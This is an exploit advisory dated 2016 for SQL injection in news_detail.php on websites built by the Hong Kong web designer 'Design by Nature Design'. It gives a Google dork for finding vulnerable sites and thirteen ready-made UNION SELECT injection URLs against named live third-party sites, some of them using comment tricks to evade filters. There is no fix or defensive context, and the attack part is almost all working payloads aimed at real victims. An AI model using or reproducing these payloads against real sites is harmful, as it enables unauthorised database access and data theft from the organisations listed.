######################
# Exploit Title : Design by Nature Design SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.naturedesign.com.hk/
# Google Dork : intext:"Design by Nature Design" news_detail
# Date: 24 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.aircadets.org.hk/chi/news_detail.php?newsID=-2511%27+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20-
# http://www.baby-q.hk/tc/news_detail.php?id=-13%27+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10--%20-
# http://ecosway.com.hk/chi/news_detail.php?id=-80%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--%20-
# http://www.grosse.hk/jp/news_detail.php?id=-50%27+union+select+1,2,3,version(),5,6,7--%20-
# http://www.akon.com.hk/web/news_detail.php?id=-24%27+union+select+1,2,3,version(),5,6,7--%20-
# http://demo.naturedesign.com.hk/client/tunghing/layout2/tc/news_detail.php?id=-7%27+union+select+1,2,3,version(),5,6,7,8,9,10,11--%20-
# http://www.eagle-tungyung.com/2012/en/news_detail.php?id=-43%27+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--%20-
# http://www.lelalove.com/en/news_detail.php?id=-9%27+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10--%20-
# http://www.bcurrisports.com/2012/news_detail.php?id=-3%27+/*!50000union*/+select+1,2,version(),4--%20-
# http://yijinhkit.edu.hk/web4/news_detail.php?id=-1%27+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--%20-
# http://www.wineworld.com.hk/2015/news_detail.php?id=-77%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86--%20-
# http://winfat.com.hk/2013/news_detail.php?newsID=-8%27+union+select+1,2,3,version(),5,6,7,8,9,10--%20-
# http://www.fisherfolks.com.hk/tc/news_detail.php?id=-15%27+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
######################
# discovered by : modiret
######################
